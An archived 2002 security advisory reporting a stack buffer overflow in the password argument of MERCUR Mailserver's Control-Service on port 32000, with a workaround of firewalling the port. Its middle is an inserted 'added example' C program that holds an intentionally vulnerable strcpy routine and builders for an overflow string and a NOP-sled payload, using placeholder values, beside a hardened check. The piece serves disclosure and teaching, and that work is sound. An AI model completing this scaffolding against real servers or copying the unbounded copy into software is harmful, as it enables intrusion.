MERCUR Mailserver advisory/remote exploit

From: 2c79cbe14ac7d0b8472d3f129fa1df (c79cbe14ac7d0b8472d3f129fa1df55at_private)
Date: Wed Jul 17 2002 - 17:29:48 PDT


    2c79cbe14ac7d0b8472d3f129fa1df55 Security Advisory #3
    
    #PRODUCT
    
    Atrium Software International's
    MERCUR Mailserver, All Versions
    
    #DESCRIPTION
    
    MERCUR Mailserver's Control-Service, installed and
    activated by default on TCP port 32000, is vulnerable
    to a classic stack-based buffer overflow in its
    password argument. An exploit for MERCUR 4.2 (current
    at the time of writing) is included; it has been tested
    against both Windows 2000 and Windows XP Professional.
    
    Stack layout at the overflow point (password buffer,
    then the saved frame pointer and return address):
    
    <260 bytes><EBP><EIP>
    
    As you can see, I'm too lazy to write my own shellcode
    to fit in that wee little 260-byte buffer, and we
    can't choose the right side, as anything over a few
    bytes will end up overwriting what will become the
    contents of ECX prior to our target RET, causing an
    early exception. So a sexy little trick is in order.
    
    We simply abuse the fact that an invalid username of
    very large length is copied into local memory and
    stays resident there when we overrun the password
    buffer. By sizing these two arguments correctly, the
    overwritten return address can transfer control from
    the password buffer into the payload held in the
    username buffer, so the shellcode never has to fit in
    260 bytes. YIPPPEE!@!#
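    The following C program is an added example, not the advisory's exploit or any MERCUR source: it reconstructs the two-buffer layout described above (the 260-byte password buffer followed by saved EBP and EIP, and the large username argument that carries the payload) and puts a hardened length check beside the unbounded copy that causes this bug class. The 260-byte size and the 268-byte total come from the layout above; the username buffer size, the NOP sled, the placeholder return address 0x11223344 and the four-byte `int3` stand-in for shellcode are assumptions chosen for the demo and are not real values from the advisory.

```c
/* Added example: two-buffer overflow layout and a hardened check.
 * Not MERCUR's code and not the advisory's exploit. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define PASS_BUF_SIZE 260                 /* from the advisory's <260 bytes><EBP><EIP> layout */
#define SAVED_EBP_OFF PASS_BUF_SIZE       /* 260 */
#define SAVED_EIP_OFF (PASS_BUF_SIZE + 4) /* 264 */
#define OVERFLOW_LEN  (SAVED_EIP_OFF + 4) /* 268: nothing may follow EIP (it would clobber ECX) */
#define USER_BUF_SIZE 1024                /* assumed: large username buffer that stays resident */

static void put_le32(uint8_t *p, uint32_t v) {
    p[0] = (uint8_t)v; p[1] = (uint8_t)(v >> 8);
    p[2] = (uint8_t)(v >> 16); p[3] = (uint8_t)(v >> 24);
}

uint32_t get_le32(const uint8_t *p) {
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Hypothetical reconstruction of the bug class: the password argument is copied
 * unbounded into a 260-byte stack buffer. Illustrative only; do not call with
 * more than 259 bytes, that is the overflow. */
int check_password_vulnerable(const char *arg) {
    char pass[PASS_BUF_SIZE];
    strcpy(pass, arg);               /* >259 bytes overwrite saved EBP, then saved EIP */
    return strcmp(pass, "secret") == 0;
}

/* Hardened version: measure first, refuse over-length input, then copy. */
int check_password_hardened(const char *arg) {
    char pass[PASS_BUF_SIZE];
    size_t n = strlen(arg);
    if (n >= sizeof pass) return -1; /* too long: reject rather than overflow or silently truncate */
    memcpy(pass, arg, n + 1);
    return strcmp(pass, "secret") == 0;
}

/* Password argument: 260 filler bytes, then EBP, then EIP, and nothing after EIP,
 * because the advisory notes that extra bytes clobber ECX and fault before the RET. */
size_t build_password_overflow(uint8_t *out, size_t cap, uint32_t fake_ebp, uint32_t ret_addr) {
    if (cap < OVERFLOW_LEN) return 0;
    memset(out, 'A', PASS_BUF_SIZE);
    put_le32(out + SAVED_EBP_OFF, fake_ebp);
    put_le32(out + SAVED_EIP_OFF, ret_addr);
    return OVERFLOW_LEN;
}

/* Username argument: carries the payload, since it does not have to fit in 260 bytes.
 * The NOP sled in front of the code is my addition (not in the advisory); it lets
 * ret_addr land anywhere inside the sled rather than on one exact byte. */
size_t build_username_payload(uint8_t *out, size_t cap, size_t sled_len,
                              const uint8_t *code, size_t code_len) {
    if (sled_len + code_len > cap) return 0;
    memset(out, 0x90, sled_len);          /* x86 NOP */
    memcpy(out + sled_len, code, code_len);
    return sled_len + code_len;
}

/* Demo values: the return address is a placeholder, NOT a real win2k/winxp address,
 * and the "payload" is four int3 bytes standing in for shellcode. */
#define DEMO_RET_ADDR 0x11223344u
static uint8_t demo_pass[OVERFLOW_LEN];
static uint8_t demo_user[USER_BUF_SIZE];
static const uint8_t demo_code[] = { 0xcc, 0xcc, 0xcc, 0xcc };

size_t demo_password_len(void) {
    return build_password_overflow(demo_pass, sizeof demo_pass, 0x41414141u, DEMO_RET_ADDR);
}
const uint8_t *demo_password_bytes(void) { demo_password_len(); return demo_pass; }
size_t demo_username_len(void) {
    return build_username_payload(demo_user, sizeof demo_user, 512, demo_code, sizeof demo_code);
}

/* Constructed 299-byte password used to show the hardened check refusing it. */
const char *oversized_password(void) {
    static char big[300];
    memset(big, 'A', sizeof big - 1);
    big[sizeof big - 1] = '\0';
    return big;
}

int main(void) {
    printf("password arg: %zu bytes, EIP -> 0x%08x\n",
           demo_password_len(), get_le32(demo_pass + SAVED_EIP_OFF));
    printf("username arg: %zu bytes (sled + payload)\n", demo_username_len());
    printf("hardened check on oversized password: %d\n",
           check_password_hardened(oversized_password()));
    return 0;
}
```

    The point of keeping both check functions side by side is the fix the vendor would need: the copy must be preceded by a length check against the destination size, and an over-length argument must be refused outright, since silently truncating it would still let the client pick the bytes that land next to the saved frame.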
    
    #FIX/PATCH/WORKAROUND
    
    No patch this time, as the workaround is simple: MERCUR
    lets you restrict access to each service individually
    under the Security -> Firewall options. Port 32000
    should be restricted by default, and I would guess it
    soon may be.
    
    Sorry about the Winamp patch; who the hell knew WinRAR
    uses a proprietary zip format.
    
    symantec's #1 fan,
    2c79cbe14ac7d0b8472d3f129fa1df55
    

    This archive was generated by hypermail 2b30 : Thu Jul 18 2002 - 08:18:43 PDT